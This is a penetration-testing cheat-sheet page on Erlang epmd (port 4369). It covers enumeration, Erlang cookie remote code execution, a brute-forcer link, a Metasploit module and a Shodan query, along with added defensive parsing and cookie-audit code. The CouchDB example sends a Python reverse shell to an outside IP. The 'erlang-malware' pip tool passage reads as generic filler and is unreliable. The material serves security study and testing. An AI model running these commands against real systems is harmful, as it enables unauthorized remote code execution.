Basic Info
The Erlang Port Mapper Daemon (epmd) serves as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of epmd is crucial for the seamless interaction and communication between different Erlang nodes across a network.
Default port: 4369
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
Enumeration
Manual
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
# Via Erlang. Download the package from: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl # Once Erlang is installed, this opens an Erlang shell
1> net_adm:names('<HOST>'). % Returns the node names registered with epmd and their ports
Automatic
The Erlang Port Mapper Daemon (EPMD) is a service that runs on port 4369 by default and is used by Erlang distributed systems to facilitate communication between nodes. EPMD is responsible for registering and unregistering nodes, as well as providing information about the nodes running on a network.
During a pentest, it is important to identify and exploit any vulnerabilities in EPMD to gain unauthorized access to the Erlang distributed system. One way to automate this process is by using the epmd_discover tool from the erlang-malware project.
epmd_discover is a Python script that leverages the epmd module to scan a network for EPMD services. It can be used to discover running Erlang nodes, gather information about them, and potentially exploit any vulnerabilities found.
To use epmd_discover, follow these steps:
- Install the required dependencies by running the following command:
pip install erlang-malware
- Run the epmd_discover script with the target IP address or range as an argument:
epmd_discover <target_ip>
The script will scan the specified IP address or range for open EPMD ports and display information about any discovered Erlang nodes.
By automating the discovery and enumeration of EPMD services, the epmd_discover tool can save time and effort during a pentest, allowing for more efficient identification and exploitation of vulnerabilities in Erlang distributed systems.
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
| bigcouch: 11502
| freeswitch: 8031
| ecallmgr: 11501
| kazoo_apps: 11500
|_ kazoo-rabbitmq: 25672
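The `\x00\x01\x6e` bytes sent in the manual check are an EPMD NAMES request (2-byte length, then `n`); the reply is a 4-byte big-endian epmd port followed by `name X at port Y` lines. The following is an added example, not code from the original page: it parses that reply so an administrator can compare what epmd advertises on their own hosts against an expected inventory. The function names, the allow-list and the sample reply (built from the nmap output above) are assumptions made for illustration.

```python
import re
import socket
import struct

# 2-byte big-endian length (1) followed by 'n' (NAMES_REQ) == b"\x00\x01\x6e"
NAMES_REQ = struct.pack(">HB", 1, ord("n"))
_LINE = re.compile(rb"^name (\S+) at port (\d+)$")


def parse_names_resp(data: bytes):
    """Return (epmd_port, {node_name: dist_port}) from a raw NAMES reply."""
    if len(data) < 4:
        raise ValueError("truncated EPMD reply: missing 4-byte port header")
    (epmd_port,) = struct.unpack(">I", data[:4])
    nodes = {}
    for line in data[4:].splitlines():
        m = _LINE.match(line.strip())
        if m:  # ignore blank or unexpected lines
            nodes[m.group(1).decode("ascii", "replace")] = int(m.group(2))
    return epmd_port, nodes


def query_epmd(host: str, port: int = 4369, timeout: float = 3.0):
    """Ask the epmd on a host you administer which nodes it advertises."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(NAMES_REQ)
        chunks = []
        while True:  # epmd closes the connection after the reply
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_names_resp(b"".join(chunks))


def unexpected_nodes(nodes, allowed):
    """Node names advertised by epmd that are missing from the inventory."""
    return sorted(n for n in nodes if n not in allowed)


# Constructed sample reply mirroring the nmap output shown above.
SAMPLE = struct.pack(">I", 4369) + (
    b"name bigcouch at port 11502\n"
    b"name freeswitch at port 8031\n"
    b"name ecallmgr at port 11501\n"
    b"name kazoo_apps at port 11500\n"
    b"name kazoo-rabbitmq at port 25672\n"
)
```

Each distribution port in the result is a listener that accepts anyone holding the cookie, so these ports and 4369 are the ones to keep off untrusted networks.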
Erlang Cookie RCE
Remote Connection
If you can leak the authentication cookie, you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by Erlang at the first start. If not modified or set manually, it is a random string [A-Z] with a length of 20 characters.
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
Eshell V8.1 (abort with ^G)
At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
More information: https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
A program to brute-force the cookie is also shared:
{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}
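Because the cookie described in this section is the only secret protecting a node, a host review should check how it is stored and passed. The following is an added example, not code from the original page: it flags a cookie file readable beyond its owner, a cookie that still has the auto-generated shape described above (20 characters, A-Z), and processes that expose the cookie on their command line. The function names and the finding wording are assumptions made for illustration.

```python
import os
import re
import stat

# Shape of the auto-generated cookie as described above: 20 characters, A-Z.
DEFAULT_SHAPE = re.compile(r"^[A-Z]{20}$")
# Both spellings appear in the commands on this page.
_ARGV = re.compile(r"(?:^|\s)-(?:set)?cookie\s+\S+")


def audit_cookie(path):
    """Return a list of findings for one .erlang.cookie file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(f"mode {mode:04o}: accessible beyond the owner")
    with open(path, "r", encoding="ascii", errors="replace") as fh:
        cookie = fh.read().strip()
    if DEFAULT_SHAPE.match(cookie):
        findings.append("auto-generated default cookie (20 chars, A-Z)")
    elif len(cookie) < 20:
        findings.append(f"short cookie ({len(cookie)} chars)")
    return findings


def cookie_in_argv(cmdline):
    """True if a process command line carries the cookie as an argument,
    where any local user who can list processes can read it."""
    return bool(_ARGV.search(cmdline))
```

Run `audit_cookie` against the home directory of every account that starts an Erlang node, and `cookie_in_argv` over the process list of the same host.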
Local Connection
In this case, CouchDB is used locally:
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
Example taken from https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution
You can use the Canape HTB machine to practice exploiting this vulnerability.
Metasploit
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
Shodan
port:4369 "at port"